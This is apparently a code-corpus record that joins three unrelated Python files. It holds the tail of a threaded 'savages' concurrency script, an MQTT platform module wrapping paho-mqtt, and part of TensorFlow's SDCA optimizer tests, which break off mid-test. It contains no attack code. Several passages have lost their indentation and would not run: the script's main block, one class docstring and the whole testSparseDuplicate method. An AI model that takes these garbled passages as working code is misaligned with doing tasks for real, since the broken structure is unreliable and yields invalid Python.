        for i in range(1, randint(2, 30)):
            savage()
            print(f"There is {shares} share(s) left after {i} savage(s) ate.")
        time.sleep(randint(0, 5))
if __name__ == "__main__":
p = threading.Thread(target = fill_pot)
p2 = threading.Thread(target = generate_savages)
p.start()
p2.start() |
Platform.py | import json
from sys import platform
import threading
from typing import Any, Optional
import paho.mqtt.client as mqtt
from pydantic.class_validators import validator
from modules.base.Configuration import *
from modules.base.Instances import *
class MqttAvailabilityConfiguration(Configuration):
    '''Availability topic and last will.'''
    topic: str
    '''configured topic for the mqtt client's last will; a message is also sent here on connect'''
    payload_on: str
    '''payload to send when connected successfully'''
    payload_off: str
    '''payload to send when the connection disappeared (last will)'''
@configuration
class MqttPlatformConfiguration(PlatformConfiguration):
    '''Configuration settings for the MQTT platform.'''
    @validator('platform')
    def check_platform(cls, v):
        # Reject configs that reference any platform other than plugins.mqtt.
        if "plugins.mqtt" not in v:
            raise ValueError("wrong platform: plugins.mqtt, is: " + v)
        return v
    host: str
    '''MQTT server address'''
    port: int
    '''MQTT server port'''
    keep_alive: Optional[int] = 60
    '''seconds to keep the server connection'''
    availability: Optional[MqttAvailabilityConfiguration]
    '''Availability topic and last will'''
    on_connected: Optional[list[AutomationConfiguration]] = []
    '''List of Automations to execute when the connection to the host is established, see `modules.base.Configuration.AutomationConfiguration`'''
    on_disconnected: Optional[list[AutomationConfiguration]] = []
    '''List of Automations to execute when the connection to the host is lost, see `modules.base.Configuration.AutomationConfiguration`'''
    on_message: Optional[list[AutomationConfiguration]] = []
    '''List of Automations to execute when a MQTT message is received, see `modules.base.Configuration.AutomationConfiguration`'''
class Platform(BasePlatform):
    '''MQTT Platform: wraps a paho-mqtt client, dispatches subscriptions to
    registered callbacks and runs the configured automations on connect,
    disconnect and message events.'''

    def __init__(self, parent: Stackable, config: MqttPlatformConfiguration) -> None:
        super().__init__(parent, config)
        self.app = parent.get_app()
        self.configuration = config
        # List of {"topic": str, "callback": callable} registered via subscribe().
        self.callbacks = []

    def start(self, call_stack: CallStack):
        '''Create the MQTT client, register the last will, connect and start
        the network loop in a background thread.'''

        def render(var):
            '''this is only to avoid typing errors'''
            return str(call_stack.get(var))

        app_id = str(self.app.get_variable_value("id"))
        self.client = mqtt.Client(app_id + "_" + render(self.app.get_id("device").configuration.name)) #type: ignore
        self.client.on_connect = self.__init_on_connect()
        self.client.on_disconnect = self.__init_on_disconnect()
        self.client.on_message = self.__init_on_message()

        av_topic = None
        av_payload_on = None
        if self.configuration.availability:
            av = self.configuration.availability
            av_topic = render(av.topic)
            av_payload_on = render(av.payload_on)
            av_payload_off = render(av.payload_off)
            # BUGFIX: paho-mqtt requires will_set() to be called BEFORE
            # connect(); the will was previously registered after connecting,
            # so the broker never learned about it.
            self.client.will_set(av_topic, av_payload_off)

        self.client.connect(self.configuration.host, self.configuration.port, self.configuration.keep_alive)

        if av_topic is not None:
            # Announce availability once connected (retained so late
            # subscribers see it too).
            self.client.subscribe(av_topic)
            self.publish(av_topic, av_payload_on, retain = True)

        def loop():
            self.client.loop_start()

        loop_thread = threading.Thread(target=loop)
        loop_thread.start()
        super().start(call_stack)

    def dispose(self):
        '''Stop the MQTT network loop.'''
        self.client.loop_stop()
        return super().dispose()

    def __init_on_message(self):
        '''Build the paho on_message handler; instantiates the configured
        on_message automations once.'''
        self.on_message_automations = []
        if self.configuration.on_message:
            for automation in self.configuration.on_message:
                self.on_message_automations.append(Automation(self, automation))

        def method(client, userdata, msg):
            payload = msg.payload.decode("utf-8")
            try:
                payload = json.loads(payload)
            except Exception:
                # Not JSON — pass the raw text through unchanged.
                payload = str(payload)
            call_stack = CallStack()\
                .with_stack(self.get_full_stack()) \
                .with_keys({
                    "payload": payload,
                    "topic": msg.topic
                })
            for callback in self.callbacks:
                if callback["topic"] == msg.topic:
                    callback["callback"](call_stack)
                elif str(callback["topic"]).endswith("+") or str(callback["topic"]).endswith("#"):
                    # Crude wildcard support: match on the subscription prefix.
                    # NOTE(review): this only approximates MQTT wildcard
                    # semantics ('+' matches a single level, '#' the rest).
                    if str(msg.topic).startswith(str(callback["topic"])[0:-2]):
                        callback["callback"](call_stack)
            for automation in self.on_message_automations:
                automation.invoke(call_stack)
        return method

    def __init_on_disconnect(self):
        '''Build the paho on_disconnect handler; instantiates the configured
        on_disconnected automations once.'''
        self.on_disconnect_actions = []
        if self.configuration.on_disconnected:
            for automation in self.configuration.on_disconnected:
                self.on_disconnect_actions.append(Automation(self, automation))

        def method(client, userdata, rc):
            # paho-mqtt (v1 API) passes the disconnect result code as the
            # third argument — it was previously mislabelled "flags".
            call_stack = CallStack()\
                .with_stack(self.get_full_stack()) \
                .with_key("flags", rc)
            for automation in self.on_disconnect_actions:
                automation.invoke(call_stack)
        return method

    def __init_on_connect(self):
        '''Build the paho on_connect handler; instantiates the configured
        on_connected automations once.'''
        self.on_connected_actions = []
        if self.configuration.on_connected:
            for automationConfig in self.configuration.on_connected:
                self.on_connected_actions.append(Automation(self, automationConfig))

        def method(client, userdata, flags, rc):
            call_stack = CallStack()\
                .with_stack(self.get_full_stack()) \
                .with_key("return_code", rc)
            # (Re-)subscribe everything on each (re)connect, since the broker
            # forgets subscriptions of non-persistent sessions.
            for callback in self.callbacks:
                self.client.subscribe(callback["topic"])
            for automation in self.on_connected_actions:
                automation.invoke(call_stack)
        return method

    def subscribe(self, topic: str, callback=None):
        '''Subscribe to a topic, optionally registering a per-topic callback.'''
        if callback is not None:
            self.callbacks.append({"topic": topic, "callback": callback})
        self.client.subscribe(topic)

    def publish(self, topic: str, payload: Any, retain: bool = False):
        '''Publish a payload; dicts are JSON-encoded, anything else is sent
        as its string representation.'''
        if isinstance(payload, dict):
            payload = json.dumps(payload)
        else:
            # Unexpected type, just send it as a string.
            payload = str(payload)
        self.client.publish(topic, payload, qos = 1, retain = retain)
|
sdca_ops_test.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SdcaModel."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
import tensorflow as tf
from tensorflow.core.example import example_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.platform import googletest
from tensorflow_estimator.python.estimator.canned.linear_optimizer.python.utils.sdca_ops import _SDCAModel
from tensorflow_estimator.python.estimator.canned.linear_optimizer.python.utils.sdca_ops import _SparseFeatureColumn
# Maximum number of minimize() steps the convergence tests run.
_MAX_ITERATIONS = 100
# num_table_shards values to exercise (None = unsharded default).
_SHARD_NUMBERS = [None, 1, 3]
# Worker counts used by the distributed test.
_NUM_LOSS_PARTITIONS = [4]
def make_example_proto(feature_dict, target, value=1.0):
  """Build a tf.Example with a float 'target' plus sparse feature columns.

  Each feature_dict entry `name -> indices` becomes a '<name>_indices'
  int64 list and a '<name>_values' float list filled with `value`.
  """
  ex = example_pb2.Example()
  feats = ex.features.feature
  feats['target'].float_list.value.append(target)
  for name, indices in feature_dict.items():
    feats[name + '_indices'].int64_list.value.extend(indices)
    feats[name + '_values'].float_list.value.extend([value] * len(indices))
  return ex
def make_example_dict(example_protos, example_weights):
  """Parse serialized Examples into the dict format _SDCAModel expects."""
  feature_spec = {
      'target':
          tf.io.FixedLenFeature(
              shape=[1], dtype=tf.dtypes.float32, default_value=0),
      'age_indices':
          tf.io.VarLenFeature(dtype=tf.dtypes.int64),
      'age_values':
          tf.io.VarLenFeature(dtype=tf.dtypes.float32),
      'gender_indices':
          tf.io.VarLenFeature(dtype=tf.dtypes.int64),
      'gender_values':
          tf.io.VarLenFeature(dtype=tf.dtypes.float32)
  }
  parsed = tf.compat.v1.io.parse_example(
      [p.SerializeToString() for p in example_protos], feature_spec)

  def sparse_column(name):
    """Build a _SparseFeatureColumn from the '<name>_indices/_values' pair."""
    example_row_ids = tf.reshape(
        tf.split(
            value=parsed[name + '_indices'].indices,
            num_or_size_splits=2,
            axis=1)[0], [-1])
    return _SparseFeatureColumn(
        example_row_ids,
        tf.reshape(parsed[name + '_indices'].values, [-1]),
        tf.reshape(parsed[name + '_values'].values, [-1]))

  return dict(
      sparse_features=[sparse_column('age'), sparse_column('gender')],
      dense_features=[],
      example_weights=example_weights,
      example_labels=tf.reshape(parsed['target'], [-1]),
      example_ids=['%d' % i for i in range(0, len(example_protos))])
def make_random_examples_and_variables_dicts(num_examples, dim, num_non_zero):
  """Generate a seeded random sparse dataset and a zero weight vector.

  Each example gets `num_non_zero` distinct feature ids out of `dim`, all
  with value num_non_zero**-0.5, plus a random weight and 0/1 label.
  """
  random.seed(1)
  # Random calls are issued in the same order as before so the seeded
  # output is identical: sample() per example first, then the weights and
  # labels via random().
  row_ids = [i for i in range(num_examples) for _ in range(num_non_zero)]
  col_ids = [
      j for _ in range(num_examples)
      for j in random.sample(range(dim), num_non_zero)
  ]
  values = [num_non_zero**(-0.5) for _ in range(num_examples * num_non_zero)]
  sparse_features = [_SparseFeatureColumn(row_ids, col_ids, values)]
  examples_dict = dict(
      sparse_features=sparse_features,
      dense_features=[],
      example_weights=[random.random() for _ in range(num_examples)],
      example_labels=[
          1. if random.random() > 0.5 else 0. for _ in range(num_examples)
      ],
      example_ids=[str(i) for i in range(num_examples)])
  weights = tf.compat.v1.Variable(tf.zeros([dim], dtype=tf.dtypes.float32))
  variables_dict = dict(
      sparse_features_weights=[weights], dense_features_weights=[])
  return examples_dict, variables_dict
def make_variable_dict(max_age, max_gender, num_shards=None, partitioned=False):
  """Create zero 'age'/'gender' weight variables, optionally partitioned."""
  # TODO(dbaylor):  Figure out how to derive max_age & max_gender from
  # examples_dict.
  partitioner = None
  if partitioned:
    partitioner = tf.compat.v1.fixed_size_partitioner(num_shards=2, axis=0)
  # Scope name encodes the shard count so repeated calls in one graph do not
  # collide.
  with tf.compat.v1.variable_scope(
      name_or_scope=('variables/shard_{}'.format(num_shards)
                     if num_shards else 'variables'),
      partitioner=partitioner):
    age_weights = tf.compat.v1.get_variable(
        name='age',
        initializer=tf.zeros([max_age + 1], dtype=tf.dtypes.float32))
    gender_weights = tf.compat.v1.get_variable(
        name='gender',
        initializer=tf.zeros([max_gender + 1], dtype=tf.dtypes.float32))
  return dict(
      sparse_features_weights=[age_weights, gender_weights],
      dense_features_weights=[])
def make_dense_examples_and_variables_dicts(dense_features_values, weights,
                                            labels):
  """Creates examples and variables dictionaries for dense features.

  Variables shapes are inferred from the list of dense feature values passed as
  argument.

  Args:
    dense_features_values: The values of the dense features
    weights: The example weights.
    labels: The example labels.

  Returns:
    One dictionary for the examples and one for the variables.
  """
  dense_tensors = []
  dense_weights = []
  for dense_feature in dense_features_values:
    dense_tensor = ops.convert_to_tensor(dense_feature, dtype=tf.dtypes.float32)
    # Runtime guard: reject tensors of rank > 2.
    check_shape_op = tf.debugging.Assert(
        tf.math.less_equal(tf.rank(dense_tensor), 2),
        ['dense_tensor shape must be [batch_size, dimension] or [batch_size]'])
    # Reshape to [batch_size, dense_column_dimension].
    with tf.control_dependencies([check_shape_op]):
      dense_tensor = tf.reshape(dense_tensor,
                                [dense_tensor.get_shape().as_list()[0], -1])
      dense_tensors.append(dense_tensor)
    # Add variables of shape [feature_column_dimension].
    dense_weights.append(
        tf.compat.v1.Variable(
            tf.zeros([dense_tensor.get_shape().as_list()[1]],
                     dtype=tf.dtypes.float32)))
  examples_dict = dict(
      sparse_features=[],
      dense_features=dense_tensors,
      example_weights=weights,
      example_labels=labels,
      example_ids=['%d' % i for i in range(0, len(labels))])
  variables_dict = dict(
      sparse_features_weights=[], dense_features_weights=dense_weights)
  return examples_dict, variables_dict
def get_binary_predictions_for_logistic(predictions, cutoff=0.5):
  """Threshold sigmoid outputs at `cutoff` into int32 0/1 labels."""
  threshold = tf.compat.v1.ones_like(predictions) * cutoff
  return tf.cast(
      tf.math.greater_equal(predictions, threshold), dtype=tf.dtypes.int32)
def get_binary_predictions_for_hinge(predictions):
  """Threshold hinge scores at zero into int32 0/1 labels."""
  zeros = tf.compat.v1.zeros_like(predictions)
  return tf.cast(
      tf.math.greater_equal(predictions, zeros), dtype=tf.dtypes.int32)
# TODO(pmol): Refactor tests to avoid repetition of boilerplate code.
class _SDCAModelTest(TensorFlowTestCase):
  """Base SDCA optimizer test class for any loss type."""
  def _single_threaded_test_session(self):
    # Single-threaded execution keeps the SDCA updates deterministic across
    # runs, so the loss assertions can use tight tolerances.
    config = config_pb2.ConfigProto(
        inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
    return self.test_session(use_gpu=False, config=config)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithLogisticLossTest(_SDCAModelTest):
"""SDCA optimizer test class for logistic loss."""
  def testSimple(self):
    """Logistic loss on two separable examples reaches the known optimum."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        tf.compat.v1.initializers.global_variables().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        # Before training both losses are ln(2) (uniform predictions).
        self.assertAllClose(0.693147, unregularized_loss.eval())
        self.assertAllClose(0.693147, loss.eval())
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        # The high tolerance in unregularized_loss comparisons is due to the
        # fact that it's possible to trade off unregularized_loss vs.
        # regularization and still have a sum that is quite close to the
        # optimal regularized_loss value.  SDCA's duality gap only ensures that
        # the regularized_loss is within 0.01 of optimal.
        # 0.525457 is the optimal regularized_loss.
        # 0.411608 is the unregularized_loss at that optimum.
        self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.525457, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
  def testPartitionedPrimals(self):
    """Same as testSimple, but with both primal weight variables partitioned."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards, partitioned=True)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        tf.compat.v1.initializers.global_variables().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        self.assertAllClose(0.693147, unregularized_loss.eval())
        self.assertAllClose(0.693147, loss.eval())
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        # The high tolerance in unregularized_loss comparisons is due to the
        # fact that it's possible to trade off unregularized_loss vs.
        # regularization and still have a sum that is quite close to the
        # optimal regularized_loss value.  SDCA's duality gap only ensures that
        # the regularized_loss is within 0.01 of optimal.
        # 0.525457 is the optimal regularized_loss.
        # 0.411608 is the unregularized_loss at that optimum.
        self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.525457, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
  def testSomePartitionedPrimals(self):
    """Mix of a plain Variable ('age') and a PartitionedVariable ('gender')."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [0],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        # Explicitly make age a [1]-shaped Variable (which cannot be
        # partitioned), while making gender a PartitionedVariable.
        age_weights = tf.compat.v1.Variable(
            tf.zeros([1], dtype=tf.dtypes.float32))
        with tf.compat.v1.variable_scope(
            name_or_scope=('variables/shard_{}'.format(num_shards)
                           if num_shards else 'variables'),
            partitioner=tf.compat.v1.fixed_size_partitioner(
                num_shards=2, axis=0)):
          gender_weights = tf.compat.v1.get_variable(
              name='gender', initializer=tf.zeros([2], dtype=tf.dtypes.float32))
        variables = dict(
            sparse_features_weights=[age_weights, gender_weights],
            dense_features_weights=[])
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        tf.compat.v1.initializers.global_variables().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        self.assertAllClose(0.693147, unregularized_loss.eval())
        self.assertAllClose(0.693147, loss.eval())
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        # The high tolerance in unregularized_loss comparisons is due to the
        # fact that it's possible to trade off unregularized_loss vs.
        # regularization and still have a sum that is quite close to the
        # optimal regularized_loss value.  SDCA's duality gap only ensures that
        # the regularized_loss is within 0.01 of optimal.
        # 0.525457 is the optimal regularized_loss.
        # 0.593014 is the unregularized_loss at that optimum.
        self.assertAllClose(0.512591, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.593014, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
  def testSparseRandom(self):
    """A random sparse problem converges (duality gap near zero)."""
    dim = 20
    num_examples = 1000
    # Number of non-zero features per example.
    non_zeros = 10
    # Setup test data.
    with self._single_threaded_test_session():
      examples, variables = make_random_examples_and_variables_dicts(
          num_examples, dim, non_zeros)
      options = dict(
          symmetric_l2_regularization=.1,
          symmetric_l1_regularization=0,
          num_table_shards=1,
          adaptive=False,
          loss_type='logistic_loss')
      lr = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      train_op = lr.minimize()
      for _ in range(10):
        train_op.run()
      lr.update_weights(train_op).run()
      self.assertNear(0.0, lr.approximate_duality_gap().eval(), err=1e-2)
def testSparseDuplicate(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0] * 5,
'gender': [0] * 5
}, 0),
make_example_proto({
'age': [1] * 5,
'gender': [1] * 5
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError, 'Duplicate'):
train_op.run()
  def testDistributedSimple(self):
    """Multiple worker threads each minimize their own example partition."""
    # Distributed SDCA may not converge if the workers update concurrently the
    # same example. In this test the examples are partitioned across workers.
    # The examples are the same for all workers, just the example_ids are
    # different.
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    examples = make_example_dict(example_protos, example_weights)
    example_ids = tf.compat.v1.placeholder(
        tf.dtypes.string, shape=(len(example_weights),))
    examples['example_ids'] = example_ids
    variables = make_variable_dict(1, 1)
    # We need each thread to keep its own device stack or the device scopes
    # won't be properly nested.
    tf.compat.v1.get_default_graph().switch_to_thread_local()
    for num_shards in _SHARD_NUMBERS:
      for num_loss_partitions in _NUM_LOSS_PARTITIONS:
        with self._single_threaded_test_session():
          options = dict(
              # Keep the same solution as for TestSimple: since the number of
              # examples is multiplied by num_loss_partitions, multiply also
              # L2 by the same value.
              symmetric_l2_regularization=num_loss_partitions,
              symmetric_l1_regularization=0,
              loss_type='logistic_loss',
              num_table_shards=num_shards,
              num_loss_partitions=num_loss_partitions)
          lr = _SDCAModel(examples, variables, options)
          tf.compat.v1.initializers.global_variables().run()
          unregularized_loss = lr.unregularized_loss(examples)
          loss = lr.regularized_loss(examples)
          predictions = lr.predictions(examples)
          self.assertAllClose(0.693147, unregularized_loss.eval())
          self.assertAllClose(0.693147, loss.eval())
          train_op = lr.minimize()
          def minimize(worker_id):
            # Each worker feeds distinct example_ids so no two workers update
            # the same dual variable concurrently.
            with context.graph_mode(), self._single_threaded_test_session():
              feed_dict = {
                  example_ids: [
                      str(i + worker_id * len(example_weights))
                      for i in range(len(example_weights))
                  ]
              }
              for _ in range(_MAX_ITERATIONS):
                train_op.run(feed_dict=feed_dict)  # pylint: disable=cell-var-from-loop
          threads = []
          for worker_id in range(num_loss_partitions):
            threads.append(threading.Thread(target=minimize, args=(worker_id,)))
            threads[-1].start()
          for t in threads:
            t.join()
          lr.update_weights(train_op).run(feed_dict={
              example_ids: [str(i) for i in range(len(example_weights))]
          })
          # Test only the unregularized loss because the optimal value of the
          # regularized loss depends on num_loss_partitions.
          self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.02)
          predicted_labels = get_binary_predictions_for_logistic(predictions)
          self.assertAllEqual([0, 1], predicted_labels.eval())
          self.assertNear(0.0, lr.approximate_duality_gap().eval(), 0.02)
  def testSimpleNoL2(self):
    """Constructing the model with zero L2 regularization must raise."""
    # L2 regularization of SDCA should be positive.
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1, 1)
      options = dict(
          symmetric_l2_regularization=0,
          symmetric_l1_regularization=0,
          num_table_shards=1,
          loss_type='logistic_loss')
      with self.assertRaises(ValueError):
        _SDCAModel(examples, variables, options)
  def testSomeUnweightedExamples(self):
    """Zero-weight examples are ignored; optimum matches testSimple."""
    # Setup test data with 4 examples, but should produce the same
    # results as testSimple.
    example_protos = [
        # Will be used.
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        # Will be ignored.
        make_example_proto({
            'age': [1],
            'gender': [0]
        }, 0),
        # Will be used.
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
        # Will be ignored.
        make_example_proto({
            'age': [1],
            'gender': [0]
        }, 1),
    ]
    example_weights = [1.0, 0.0, 1.0, 0.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        # Only use examples 0 and 2
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        tf.compat.v1.initializers.global_variables().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        # Same optimum as testSimple since the zero-weight examples drop out.
        self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.525457, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllClose([0, 1, 1, 1], predicted_labels.eval())
        self.assertAllClose(
            0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
  def testFractionalExampleLabel(self):
    """Logistic loss must reject labels that are not exactly 0.0 or 1.0."""
    # Setup test data with 1 positive, and 1 mostly-negative example.
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0.1),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 0.9),
    ]
    example_weights = [1.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        tf.compat.v1.initializers.global_variables().run()
        # The fractional labels are only detected when the training op runs.
        with self.assertRaisesOpError(
            'Only labels of 0.0 or 1.0 are supported right now.'):
          lr.minimize().run()
  def testImbalanced(self):
    """Convergence with a class-imbalanced dataset (1 positive, 3 negative)."""
    # Setup test data with 1 positive, and 3 negative examples.
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [2],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [3],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0, 1.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        # 'age' has 4 buckets (ids 0..3), hence dimension 3 here —
        # presumably make_variable_dict takes max ids; TODO confirm.
        variables = make_variable_dict(3, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        tf.compat.v1.initializers.global_variables().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        self.assertAllClose(
            0.226487 + 0.102902, unregularized_loss.eval(), atol=0.08)
        self.assertAllClose(0.328394 + 0.131364, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 0, 0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
  def testImbalancedWithExampleWeights(self):
    """Per-example weights skew the optimum toward the heavier example."""
    # Setup test data with 1 positive, and 1 negative example.
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    # Negative example weighted 3x the positive one.
    example_weights = [3.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        tf.compat.v1.initializers.global_variables().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        self.assertAllClose(0.284860, unregularized_loss.eval(), atol=0.08)
        self.assertAllClose(0.408044, loss.eval(), atol=0.012)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
  def testInstancesOfOneClassOnly(self):
    """Training on a single class (positive example zero-weighted) converges."""
    # Setup test data with 1 positive (ignored), and 1 negative example.
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [0]
        }, 1),  # Shares gender with the instance above.
    ]
    example_weights = [1.0, 0.0]  # Second example "omitted" from training.
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        tf.compat.v1.initializers.global_variables().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.525457, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        # Both examples predicted negative: the shared 'gender' weight was
        # only trained against the negative example.
